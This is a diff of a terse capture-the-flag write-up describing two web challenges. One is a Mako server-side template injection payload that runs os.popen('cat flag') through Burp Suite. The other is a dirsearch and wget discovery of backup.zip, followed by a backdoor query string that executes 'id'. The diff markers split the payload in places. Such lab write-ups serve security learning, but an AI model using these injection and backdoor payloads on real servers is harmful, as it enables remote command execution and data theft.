Romasia/CyberSecurity/writeup_ctf_2023.md

-curl is a command-line tool for getting or sending data including files using URL syntaxi using curl we can find out that the website is uisng Werkzeug web application library we can use Server-Side Template Injection and send MAKO payload using burp suite
+curl is a command-line tool for getting or sending data including files using URL syntaxi using curl we can find out that the website is uisng Werkzeug web application library we can use Server-Side Template Injection and send MAKO payload using burp suite name=<%

-name=<%
 <%
 import os
 x=os.popen('cat flag').read()
 %>
 ${x}
+ctf

+nodiff-backdoor
+Flag format: CTF{sha256}
+Goal: The web application contains a vulnerability which allows an attacker to leak sensitive information. dirsearch is An advanced command-line tool designed to brute force directories and files in webservers using dirsearch dirsearch -u ip we can see backup.zip file using wget command we can dowload //backup.zip if we search this file, we can find functions with vulnerabilities, after finding vulnerability we can use the backdoor to get the flag by using /?welldone=knockknock&shazam=id ctf